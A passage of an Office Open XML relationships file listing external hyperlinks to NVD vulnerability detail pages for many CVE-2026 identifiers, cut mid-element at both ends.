Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53009" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53016" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53185" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54757" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55426" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55522" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56198" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57170" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58599" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58600" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58874" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62804" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62810" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62886" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64372" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64375" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64377" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64378" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64381" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67309" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68508" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68844" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68850" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68877" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68885" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68888" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68890" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68892" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68896" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69269" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69277" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69283" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69284" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69289" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69290" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69324" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69328" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69359" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69368" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69377" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69389" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69392" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69420" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69424" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69433" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69436" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69444" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69445" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69447" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69450" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69455" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69459" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69467" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69478" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69480" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69508" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69509" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69513" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69528" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69534" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69535" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69538" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69542" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69544" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69561" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69582" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69585" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69592" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69604" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69608" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69612" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69685" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69691" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69720" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69725" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69758" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69785" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69790" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69799" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69801" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69821" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70583" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70584" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71345" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72929" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72944" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72953" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72957" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72965" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73231" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId894" /><Relationship 